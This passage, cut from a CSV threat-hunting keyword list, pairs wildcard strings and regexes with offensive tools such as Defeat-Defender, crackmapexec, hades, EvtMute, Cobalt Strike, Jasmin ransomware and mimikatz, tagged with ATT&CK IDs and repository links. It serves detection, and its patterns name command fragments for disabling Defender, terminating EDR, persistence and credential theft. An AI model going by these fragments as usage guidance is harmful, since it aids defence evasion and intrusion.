TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*.exe -U:T icacls *",".{0,1000}\.exe\s\-U\:T\sicacls\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*.exe -U:T takeown /f*\smartscreen.exe*",".{0,1000}\.exe\s\-U\:T\stakeown\s\/f.{0,1000}\\smartscreen\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle 
complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*.exe -uac",".{0,1000}\.exe\s\-uac","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*.exe UnattendedInstallFiles*",".{0,1000}\.exe\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe UnquotedServicePath*",".{0,1000}\.exe\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe Whisker -action add -target * -cert-pass *",".{0,1000}\.exe\sWhisker\s\-action\sadd\s\-target\s.{0,1000}\s\-cert\-pass\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe Whisker -action list -target *",".{0,1000}\.exe\sWhisker\s\-action\slist\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe --winlogon * *:\*.exe*",".{0,1000}\.exe\s\-\-winlogon\s.{0,1000}\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe --wmi *:\*.exe*",".{0,1000}\.exe\s\-\-wmi\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe* -d localhost * -u * -p */24*",".{0,1000}\.exe.{0,1000}\s\-d\slocalhost\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*.exe* -f *.bin -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-f\s.{0,1000}\.bin\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --Filter *rule disable { condition: true }*",".{0,1000}\.exe.{0,1000}\s\-\-Filter\s.{0,1000}rule\sdisable\s\{\scondition\:\strue\s\}.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*.exe* -path * -newTimestamp * -username * -password *",".{0,1000}\.exe.{0,1000}\s\-path\s.{0,1000}\s\-newTimestamp\s.{0,1000}\s\-username\s.{0,1000}\s\-password\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*.exe* -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* -t remotethread*",".{0,1000}\.exe.{0,1000}\s\-t\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* -t selfthread*",".{0,1000}\.exe.{0,1000}\s\-t\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-\-technique\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique remotethread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique selfthread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* -u administrator -H :*--shares*",".{0,1000}\.exe.{0,1000}\s\-u\sadministrator\s\-H\s\:.{0,1000}\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*.exe*\Terminator.sys*",".{0,1000}\.exe.{0,1000}\\Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*.Execution.Injection.Exe*",".{0,1000}\.Execution\.Injection\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.feeds.123456.*",".{0,1000}\.feeds\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.files.123456.*",".{0,1000}\.files\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.forums.123456.*",".{0,1000}\.forums\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ftp.123456.*",".{0,1000}\.ftp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.get_c2profile*",".{0,1000}\.get_c2profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*.go.123456.*",".{0,1000}\.go\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.groups.123456.*",".{0,1000}\.groups\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.help.123456.*",".{0,1000}\.help\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.HTA loader with .HTML extension for specific command*",".{0,1000}\.HTA\sloader\swith\s\.HTML\sextension\sfor\sspecific\scommand.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
"*.imap.123456.*",".{0,1000}\.imap\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.img.123456.*",".{0,1000}\.img\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.jpeg.jasmin*",".{0,1000}\.jpeg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.jpg.exe*",".{0,1000}\.jpg\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.jpg.iso*",".{0,1000}\.jpg\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.jpg.jasmin*",".{0,1000}\.jpg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.kb.123456.*",".{0,1000}\.kb\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.kerberoast.txt*",".{0,1000}\.kerberoast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.kirbi *",".{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
